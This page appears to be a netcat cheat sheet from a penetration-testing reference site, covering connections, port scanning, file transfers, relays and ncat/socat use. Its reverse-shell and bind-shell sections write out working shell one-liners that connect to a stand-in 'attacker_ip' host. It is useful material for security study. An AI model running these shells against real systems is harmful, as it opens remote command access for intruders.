โ† All cheat sheets

NETCAT

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Interactive tool: Reverse Shell Generator

Netcat is the "Swiss Army knife" of networking.
Essential for creating connections, port scanning, and file transfers.

BASIC SYNTAX#

nc [options] host port
nc -l [options] port

COMMON OPTIONS#

-l          Listen mode
-v          Verbose
-n          Skip DNS resolution
-p PORT     Local port
-e PROGRAM  Execute program on connect
-u          UDP mode
-z          Zero-I/O mode (scanning)
-w SECONDS  Timeout
-k          Keep listening

BASIC CONNECTIONS#


    

CLIENT MODE#

nc target.com 80
nc -v target.com 80

LISTENER MODE#

nc -l -p 4444
nc -lvnp 4444
nc -v target.com 80
echo "HEAD / HTTP/1.0\r\n\r\n" | nc target.com 80

PORT SCANNING#


    

TCP SCANNING#

nc -zv target.com 80
nc -zv target.com 1-1000
nc -znv -w 1 target.com 1-1000 2>&1 | grep succeeded

UDP SCANNING#

nc -zuv target.com 53

REVERSE SHELLS#


    

LISTENER (Attacker)#

nc -lvnp 4444

TARGET SIDE#

# Traditional
nc -e /bin/bash attacker_ip 4444
nc.exe -e cmd.exe attacker_ip 4444

# Without -e (mkfifo)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attacker_ip 4444 > /tmp/f

# Bash only
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

BIND SHELLS#


    

TARGET (Listener)#

nc -lvnp 4444 -e /bin/bash
nc.exe -lvnp 4444 -e cmd.exe

FILE TRANSFERS#


    

RECEIVER FIRST#

# Receiver
nc -lvnp 4444 > received_file

# Sender
nc receiver_ip 4444 < file_to_send

SENDER FIRST#

# Sender
nc -lvnp 4444 < file_to_send

# Receiver
nc sender_ip 4444 > received_file

WITH COMPRESSION#

# Sender
tar czf - directory/ | nc -lvnp 4444

# Receiver
nc sender_ip 4444 | tar xzvf -

RELAY/PIVOT#


    

SIMPLE RELAY#

mkfifo /tmp/backpipe
nc -l -p 8080 < /tmp/backpipe | nc target_ip 80 > /tmp/backpipe

HTTP REQUESTS#


    

GET REQUEST#

echo -e "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n" | nc target.com 80

SIMPLE WEB SERVER#

while true; do echo -e "HTTP/1.1 200 OK\r\n\r\nHello" | nc -l -p 8080 -q 1; done

NCAT (IMPROVED)#


    

SSL/TLS#

ncat --ssl -lvnp 4443
ncat --ssl target.com 443

EXECUTE#

ncat -lvnp 4444 --exec /bin/bash

ACCESS CONTROL#

ncat -lvnp 4444 --allow 192.168.1.0/24

SOCAT ALTERNATIVE#

# Listener
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash

# SSL listener
socat OPENSSL-LISTEN:4443,cert=cert.pem,verify=0,fork EXEC:/bin/bash

QUICK REFERENCE#

nc -lvnp 4444                           # Listener
nc target 4444                          # Connect
nc -e /bin/bash attacker 4444           # Reverse shell
nc -lvnp 4444 > file                    # Receive file
nc target 4444 < file                   # Send file
nc -zv target 1-1000                    # Port scan
ncat --ssl -lvnp 4443                   # SSL listener